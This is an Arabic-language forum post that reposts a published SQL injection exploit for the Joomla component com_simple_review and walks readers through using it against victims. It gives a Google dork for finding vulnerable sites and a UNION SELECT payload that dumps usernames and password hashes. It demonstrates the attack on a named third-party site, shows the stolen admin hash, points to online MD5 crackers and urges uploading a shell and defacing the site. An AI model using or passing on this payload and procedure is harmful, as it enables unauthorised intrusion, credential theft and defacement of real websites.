Admin المدير العام
عدد الرسائل : 181 تاريخ التسجيل : 13/06/2008
| موضوع: ثغرة اليوم نزلت لحقوو الأربعاء يناير 21, 2009 2:33 pm | |
| السلام عليكم ورحمة الله وبركاته
حبائبي أعضاء المنتدى
فاليوم قلت بروح أشوف أخر الثغرات فاوجدت لكم ثغره
مواقع كثيره م......
طبعا اليوم نزلت يعني بتلحق على ضحايا كود PHP: simple_review Sql injection# ######################################## #[~] Author : EcHoLL #[~] www.warezturk.org www.tahribat.com #[~] Greetz : Black_label Hippi Godlike Nitrous
#[!] Module_Name: com_simple_review #[!] Script_Name: Joomla #[!] Google_Dork: inurl:"com_simple_review" ########################################
www.scriptpage.com/index.php?option=com_simple_review&category=4+AND+1=2+UNION+SELECT+0,concat_ws(username,0x3a,password),2+from+jos_users--
<name>simple_review</name> <creationDate>29/05/2006</creationDate> <author>Rowan Youngson</author> <copyright>This component in released under the Mozilla Public License Version 1.1</copyright> <authorEmail> rowans@gmail.com </authorEmail>
<authorUrl>www.row1.info</authorUrl> <version>1.3.5</version> <description>Simple Review is a Review component for the Mambo CMS</description>
# milw0rm.com [2009-01-05]
شرح الثغرة
أبحث عن:
كود PHP: inurl:"com_simple_review"
أ وك حلو الحين فتح معنا وطلعت المواقع المصابه الحين أختر أي موقع ياحبيبي
طيب لنفترض أنك أخترات هذا الموقع
http://joomla.smartmobil.no
طيب الحين نبغي نحط الأ ستغلال كيف أناأقولك كيف
أول وين الأستغلال هذا هو
كود PHP: index.php?option=com_simple_review&category=4+AND+1=2+UNION+SELECT+0,concat_ws(username,0x3a,password),2+from+jos_users--
طيب عرفنا الأستغلال طيب حلو الحين نجرب على موقعنا الي وجدناه
كيف نضع الأستغلال ؟؟
أقولك يالغالي كيف يابعدي
هذا موقعنا المراد أختراقه http://joomla.smartmobil.no
أوك نضع الأستغلال بعد رابط المواقع كذا بيكون
كود PHP: http://joomla.smartmobil.no/index.php?option=com_simple_review&category=4+AND+1=2+UNION+SELECT+0,concat_ws(username,0x3a,password),2+from+jos_users--
طيب نشوف يطلع لنا الباسورد ولا مرقع الثغره الموقع يلا خلونا نشوف لووووووووووووووووووووووول طلع لنا الباسورد واليزور هذا اليوزر :admin هذا الباسورد f372d16df9f2e7a8ab91cc92b662e2a7 لكن الباسورد مشفر لكن ولا يهمك نجيبه نجيبه ننط لموقع مليروم من هنا http://www.milw0rm.com/cracker/insert.php أو هذا الموقع http://md5.rednoize.com/ وونضع الهاش حقنا وننتضر لين ينفك الهاش وأذا انفك أدخل على الموقع وأرفع شيل وأدعس عليه الشرح منقول من الأخ AzoZ | |
|